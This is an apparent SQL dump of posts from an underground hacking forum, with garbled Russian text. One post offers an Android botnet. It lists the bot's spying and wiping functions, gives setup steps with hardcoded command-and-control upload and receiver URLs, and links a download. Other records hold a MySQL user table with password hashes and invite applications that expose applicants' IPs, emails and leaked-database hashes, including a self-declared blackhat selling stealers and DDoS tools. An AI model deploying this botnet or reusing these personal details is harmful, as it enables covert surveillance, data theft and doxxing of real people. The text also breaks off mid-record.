\'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'Y\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e32, 0x7374617473, 0x2a45323643443430363932343334413541423233424242424637453638383141353241334635414341, \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e31, 0x7374617473, 0x2a45323643443430363932343334413541423233424242424637453638383141353241334635414341, \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL);\n[/php]', 1, 0, '50.7.210.37', 0, 1, 0, 0, 0), (1368, 1227, 1367, 'w0rm', 1, '', 1407430711, 'Ãâ€Ã¾Ã¼ÃµÃ½Ñ‹ уúр ýõтð úуôð üþóут ÿþôþùтø ÿðрþûø.\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:59\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `stats`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `bm_cfg`\n-- \n\nCREATE TABLE `bm_cfg` (\n `id` int(10) unsigned NOT NULL,\n `title` varchar(255) CHARACTER SET cp1251 NOT NULL,\n UNIQUE KEY `id` (`id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1;\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `bm_cfg`\n-- \n\nINSERT INTO `bm_cfg` (`id`, `title`) VALUES \n(50, \'korrespondent.net\'),\n(12815, \'unian.net\'),\n(86476, \'censor.net.ua\'),\n(153464, \'segodnya.ua\'),\n(16823948, \'lb.ua\'),\n(92303, \'kp.ua\'),\n(182538, \'tsn.ua\'),\n(54, \'comments.ua\'),\n(5272, \'for-ua.com\'),\n(145221, \'focus.ua\'),\n(456, \'pravda.com.ua\'),\n(904, \'mignews.com.ua\'),\n(1084, \'fakty.ua\'),\n(3250, \'zn.ua\'),\n(3636, \'interfax.com.ua\'),\n(5035, \'podrobnosti.com.ua\'),\n(28642, \'donbass.ua\'),\n(43618, \'glavred.info\'),\n(74336, \'from-ua.com\'),\n(86157, \'mycityua.com\'),\n(88905, \'utro.ru\'),\n(90800, \'vlasti.net\'),\n(105335, \'ura-inform.com\'),\n(108243, \'fraza.ua\'),\n(125856, \'aif.ua\'),\n(128960, \'gazeta.ua\'),\n(148481, \'utro.ua\'),\n(153098, \'versii.com\'),\n(153755, \'dozor.kharkov.ua\'),\n(157547, \'eg.ru\'),\n(169320, \'bagnet.org\'),\n(170887, \'izvestia.com.ua\'),\n(16800182, \'golosua.com\'),\n(16808873, \'vsyapravda.com\'),\n(16836484, \'bbc.co.uk\'),\n(16841018, \'glavcom.ua\'),\n(16859779, \'tyzhden.ua\'),\n(16862327, \'profinews.com.ua\'),\n(16873100, \'kyivpost.ua\'),\n(16878311, \'gazetavv.com\'),\n(16881477, \'unn.com.ua\'),\n(101585, \'eizvestia.com\'),\n(87430, \'ukrrudprom.ua\'),\n(16800646, \'minprom.ua\'),\n(16806480, \'glavport.net\'),\n(97911, \'weekly.ua\'),\n(113524, \'kommersant.ua\'),\n(150401, \'epravda.com.ua\'),\n(14885, \'companion.ua\'),\n(119932, \'delo.ua\'),\n(87931, \'ugmk.info\'),\n(16801617, \'ligazakon.ua\'),\n(178914, \'ubr.ua\'),\n(171380, \'kontrakty.ua\'),\n(145856, \'dengi.ua\'),\n(538, \'finance.ua\'),\n(1747, \'liga.net\');\n[/php]\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 20:00\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `stats`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `bm_custom_cfg`\n-- \n\nCREATE TABLE `bm_custom_cfg` (\n `id` int(10) unsigned NOT NULL,\n `title` varchar(255) CHARACTER SET cp1251 NOT NULL,\n UNIQUE KEY `id` (`id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1;\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `bm_custom_cfg`\n-- \n\nINSERT INTO `bm_custom_cfg` (`id`, `title`) VALUES \n(50, \'korrespondent.net\'),\n(12815, \'unian.net\'),\n(86476, \'censor.net.ua\'),\n(153464, \'segodnya.ua\'),\n(16823948, \'lb.ua\'),\n(92303, \'kp.ua\'),\n(182538, \'tsn.ua\'),\n(54, \'comments.ua\'),\n(5272, \'forum.ua\'),\n(145221, \'fokus.ua\'),\n(456, \'pravda.com.ua\');\n[/php]', 1, 0, '50.7.210.37', 0, 1, 0, 0, 0), (1369, 1234, 0, 'w0rm', 1, 'ßõрõõ÷ô', 1407454152, 'ÿþ÷ôрðòÃȄÂÑŽ òÑÂõх, üы ÿõрõõхðûø ýð ýþòыù ÑÂõрòõр, ñþûõõ ôôþѠýðü ýõ ÑÂтрðшõý)', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1370, 1234, 1369, 'syslink', 13, '', 1407456299, 'good work)', 1, 0, '31.7.58.98', 0, 1, 0, 0, 0), (1371, 1235, 0, 'Invite', 2, 'New invite', 1407456339, '[b]Name[/b]: Nickname\n [b]Age[/b]: \n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1372, 1236, 0, 'Invite', 2, 'New invite', 1407456467, '[b]Name[/b]: Nickname\n [b]Age[/b]: \n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1373, 1237, 0, 'Invite', 2, 'New invite', 1407456553, '[b]Name[/b]: Nickname\n [b]Age[/b]: \n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1376, 1239, 0, 'Invite', 2, 'New invite', 1407460952, '[b]Name[/b]: Nickname\n [b]Age[/b]: \n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .\n [b]ip[/b]: 37.220.1.21.', 1, 0, '', 0, 1, 0, 0, 0), (1377, 1240, 0, 'Invite', 2, 'New invite', 1407461248, '[b]Name[/b]: Nickname\n [b]ip[/b]: 37.220.1.21\n [b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '', 0, 1, 0, 0, 0), (1378, 1241, 0, 'Invite', 2, 'New invite', 1407461315, '[b]Name[/b]: Nickname\n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .\n \n [b]ip[/b]: 37.220.1.21\n [b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 1, 0, '', 0, 1, 0, 0, 0), (1475, 1334, 0, 'Invite', 2, '{$name}', 1407650752, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr.XHat[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: viking@0nl1ne.at\n[b]e-mail[/b]: Mr.XHat@gmail.com\n[b]Info[/b]: Hacking and Anti-Security, vulnerability discovery, exploit development, reverse engineering, penetration testing, social engineering, security mechanisms bypassing, hacked high profile sites, discovered 0days from web/desktop apps, wrote hacktools and more, some exploits, hacktools, hacking tutorials and more, http://ashiyane.org/forums/member.php?1068630-Mr-XHat,\r\nhttps://darkode.com/profile.php?mode=viewprofile&u=1489, http://www.zone-h.org/archive/special=1/notifier=Mr.XHat,\r\nhttp://www.exploit-db.com/author/?a=5000,\r\nhttp://www.bitdefender.com/security/tajikistan-s-google-yahoo-twitter-amazon-hacked-via-domain-registrar-breach.html,\r\nphp source code auditor, website vuln scanner, ddos botnet, password stealer, advanced fake pages, protocol password crackers, security bypass tools and more and more, i\'m blackhat hacker and enjoy from distributing underground markets and forums for fucking security, i spent more of +7 years experienced on many it fields from anti-security perspectives.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.235.227.70\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/id217207825 | http://vk.com/id217207825 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1466, 1326, 0, 'Invite', 2, 'New invite', 1407519732, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: \n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : : : : \n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1383, 1234, 1369, 'w0rm', 1, '', 1407466699, 'ßþчøÑÂтøû ñô þт ýõðúтøòð, ø ôþñðòøû ÿðру фуýúцøù ò фþрüу ÿþôðчø ÷ðÑÂòþú:\n\n- mult: [B]ÿþûõ ÿрþòõрющõõ ýõ ÿþôðòðûðÑÂÑŒ ûø ÷ðÑÂòúð рðýьшõ [/B] \n ÿрø ÿðôðчõ ÷ðÑÂòúø уÑÂтðýðòûøòðютÑÂÑ ÑÂÿõц úуúø c øýôøúðтþрþü.\n\n- ip:[B] ÿрþòõрÑÂõт тõúущøù øÿ.[/B]\n\n- User agent: [b]тõúущøù ю÷õр ðóõýт.[/b]', 1, 0, '', 0, 1, 0, 0, 0), (1476, 1335, 0, 'syslink', 13, 'Android botnet', 1407661639, 'Functions ::\r\n1) Reboot Device\r\n2) Shutdown Device\r\n3) Wipe Device\r\n4) Wipe Device AND External Memory (eg. Sdcard)\r\n5) Remove Screen Protection (eg Patterns, Pins and Codes to unlock Screen)\r\n6) Install APK as System App (USE WITH CAUTION!)\r\n7) Take a Screenshot\r\n8] Get List of Installed Packages\r\n9) Record Audio on the Device\r\n10) Take Picture (Back Camera)\r\n11) Take Picture (Front Camera [ IF EXISTING! ] )\r\n12) Zip File Directory and send all to Server (Directory: /sdcard/Android/data/settings/ )\r\n13) Disable ADB on Device\r\n14) Sends Contacts to the Server\r\n15) Gets all SMS from the Device\r\n16) Gets the Device\'s Call-Log\r\n17) Gets the Device\'s Browser Bookmarks (Default Browser)\r\n18) Gets the current Location of the Device\r\n19) ROOTED PHONE!# Sends a SU request to the Device (usefull for enabling SU rights on the Device)\r\n20) GET DEVICE ADMIN\r\n21) Roots the Device (Gingerbread and below)\r\n\r\nÃâ€Ã»Ñ Ñ‚õх úтþ ýõ ò тõüõ úðú ÑÂþñрðть ø ÿþÑÂтðòøть :\r\nÚþрþчõ òõñ ÿðýõûь ýðÿøÑÂðýð Ѡøÿþûь÷þòðýøõü CodeIgniter(MVC фрõùüòþрú PHP), ÑÂðü ñþт ýðÿøÑÂðý ýð java, ÿрþõúт ÑÂþ÷ôðý ò Eclipse.\r\n \r\nÚðú уÑÂтðýþòøть ø ÿрþòõрøть рðñþтþÑÂÿþÑÂþñýþÑÂть :\r\n \r\n1) Þтúрыòðõü WebPanel\\application\\config\\config.php ÷ðüõýÑÂõü тðü\r\n$config[\'base_url\'] = \'http://www.lucideustech.in/androidcp/\'; - ÿуть ôþ ýðшõù ÿðýõûьúø\r\n2) þтúрыòðõü \\WebPnel\\files\\alex.sql ýðхþôøü ÑÂтрþчúу INSERT INTO `tbl_user` VALUES(1, \'admin\', \'MD5 ENCRYPTED PASSWORD\'); óôõ MD5 ENCRYPTED PASSWORD - Ñ…ÑÂш ýðшõóþ ÿðрþûѠò md5\r\n3) áþ÷ôðõü ñð÷у ø úþрþчõ òыÿþûýÑÂõü ÑÂтþт sql òышõ чтþ øôõт\r\n4) WebPanel\\application\\config\\database.php - ýðÑÂтрþùúø ñô ÿþô ÑÂõñѠúþрþчõ ÿõрõÿøÑÂыòðõü\r\n5) áþ÷ôðõü ÿрþõúт ôûѠðýôрþøôð ÿþÑÂрõôÑÂтòþü øüÿþртð ø÷ ÑÂущõÑÂтòующøх øÑÂхþôýых úþôþò ò Eclipse.\r\n6) øщõü фðùûы constants.java üõýÑÂõü ÑÂтрþúу public static String AUTOROOTDL = \"http://www.lucideustech.in/androidcp/files/autoroot/\"; ýð ðôрõѠÑÂòþõù ÿðýõûьúø\r\nтðúöõ ø Ѡфðùûðüø uploader.java ::\r\nString urlServer = \"http://www.lucideustech.in/androidcp/device/upload\"; \r\nsender.java ::\r\nString URL = \"http://www.lucideustech.in/androidcp/device/receiver\"; \r\n\r\n[url]https://www.sendspace.com/file/qaqh0a[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1468, 1234, 1369, 'w0rm', 1, '', 1407520698, '×ðÿøûøû фøûьтðцøю ø ÿðру фøшõú ÿþ ðòтþ ÿрþñøòу.\n_ttp://w0rm.in:8888/showthread.php?t=1327\n\nCõùчðѠñуôу ÷ðщøщðть þт ÿþòтþрýых ÿþôðчь ÷ðÑÂòþú ÑÂðüу фþрüу.', 1, 0, '', 0, 1, 0, 0, 0), (1469, 1328, 0, 'Invite', 2, '{$name}', 1407594801, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Emailkkkkkkkk\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: 46.146.211.11\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1470, 1329, 0, 'Invite', 2, '{$name}', 1407611611, '[SIZE=\'4\'][COLOR=\'Sienna\']ReVOLVeR[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 445342\n[b]e-mail[/b]: joe_123@mail.ru\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 217.115.50.229\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Revolver : revolver@smtp.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://revolver.com.au | revolver.com.au \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1471, 1330, 0, 'Invite', 2, '{$name}', 1407613019, '[SIZE=\'4\'][COLOR=\'Sienna\']test[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: treedfg\n[b]e-mail[/b]: tesyesggmm\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Test : test@test.com : 80.93.122.2 : bb5a3fcb975122642d8a9f59608c01a9\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://test.de | test.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1391, 1234, 1383, 'w0rm', 1, '', 1407469060, '[B]up[/B]\nôþñðòøû [B]Referer[/B]', 1, 0, '', 0, 1, 0, 0, 0), (1464, 1324, 0, 'Invite', 2, 'New invite', 1407519306, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: \n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : : : : \n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1465, 1325, 0, 'Invite', 2, 'New invite', 1407519374, '[b]Name[/b]: izg0y\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: \n\n[b]Name[/b] : Izg0y : Izg0y1@gmail.com : 95.30.193.97 : 32d1821827468511bcb77c1b26cc12a3\n[b]E-Mail[/b] : : : : \n[b]IP[/b] : : : : \n \n[b]name[/b]: https://exploit.in/forum/index.php?showuser=49176 | https://exploit.in/forum/index.php?showuser=49176', 1, 0, '', 0, 1, 0, 0, 0), (1453, 1313, 0, 'Invite', 2, 'New invite', 1407516189, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1450, 1310, 0, 'Invite', 2, 'New invite', 1407503526, '///////////////////////////////////////////////////////////////////////\n///[b]Name[/b]: Nick\n///[b]ICQ/Jabber[/b]: ICQ/Jabber\n///[b]e-mail[/b]: Email\n///[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n///[b]Mult[/b]: 50.7.210.37\n///[b]Ip[/b]: 158.255.211.156\n///[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n///[b]Referer[/b]: https://www.google.ru/\n/////////////////////////////////////////////////////////////////////// \n In leaked BDs:\n \n [b]Name[/b] : lesnick : roman_30@ukr.net : 212.82.211.155 : 4362005791776a2f3704754fe9e75193\n [b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n [b]IP[/b] : : : : \n \n [b]In google[/b] : \n [b]name[/b]: http://nick.typepad.com | nick.typepad.com', 1, 0, '', 0, 1, 0, 0, 0), (1463, 1323, 0, 'Invite', 2, 'New invite', 1407518305, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : : : : \n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1454, 1314, 0, 'Invite', 2, 'New invite', 1407517045, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1455, 1315, 0, 'Invite', 2, 'New invite', 1407517220, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1456, 1316, 0, 'Invite', 2, 'New invite', 1407517231, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0), (1457, 1317, 0, 'Invite', 2, 'New invite', 1407517654, '[b]Name[/b]: 